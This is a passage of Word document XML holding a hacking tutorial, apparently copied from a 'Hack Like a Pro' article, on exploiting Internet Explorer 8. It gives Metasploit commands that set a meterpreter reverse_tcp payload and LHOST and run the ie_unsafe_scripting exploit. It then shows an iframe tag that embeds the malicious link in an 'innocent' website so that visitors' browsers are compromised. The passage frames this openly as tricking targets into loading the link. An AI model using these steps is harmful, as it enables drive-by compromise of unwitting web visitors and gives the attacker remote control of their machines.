    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Step 3 Select the Payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Then load the payload, in this case, </w:t>
      </w:r>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt; set PAYLOAD windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Step 4 Check Required Options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Next, let's check to see what options this exploit requires:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6007608" cy="5294376"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="2" name="Picture 2" descr="https://img.wonderhowto.com/img/00/75/63485307681612/0/hack-like-pro-exploit-ie8-get-root-access-when-people-visit-your-website.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00/75/63485307681612/0/hack-like-pro-exploit-ie8-get-root-access-when-people-visit-your-website.w1456.jp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7608" cy="5294376"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>We can see from the output displayed above that the payload requires us to set local host (LHOST), or in other words, the IP address of our machine. In my case, it's 192.168.1.100.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Step 5Set Local Host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">We need to tell </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> what our local host (LHOST) IP address is. Type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt; set LHOST 192.168.1.100</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Because this is a client-side exploit, we don't need to set the RHOST as we need to manually attack the system by getting them to click on our malicious link.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Step 6 Run the Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Now, let's run the exploit. Type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt; exploit (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ie_unsafe_scripting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>As you can see in the screenshot below, this exploit has generated a link (http://192.168.1.100:8080/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HG6Kn71Nva )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that we will have to get our targets to load so we can exploit their browser. To do this, we'll add a little HTML to an innocent looking webpage.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6016752" cy="5285232"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="https://img.wonderhowto.com/img/66/37/63485307827456/0/hack-like-pro-exploit-ie8-get-root-access-when-people-visit-your-website.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66/37/63485307827456/0/hack-like-pro-exploit-ie8-get-root-access-when-people-visit-your-website.w1456.jp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6752" cy="5285232"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Step 7 Add the URL to an &lt;IFRAME&gt; Tag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In order to get your target's browser to load your malicious URL, you can either send it to them directly, or embed it in an iframe on your perfectly innocent website. To do so, just add the following tag to your html anywhere inside the &lt;body&gt; element:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;iframe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.1.100:8080/HG6Kn71Nva </w:t>
      </w:r>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C057B" w:rsidRPr="005C057B" w:rsidRDefault="005C057B" w:rsidP="005C057B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
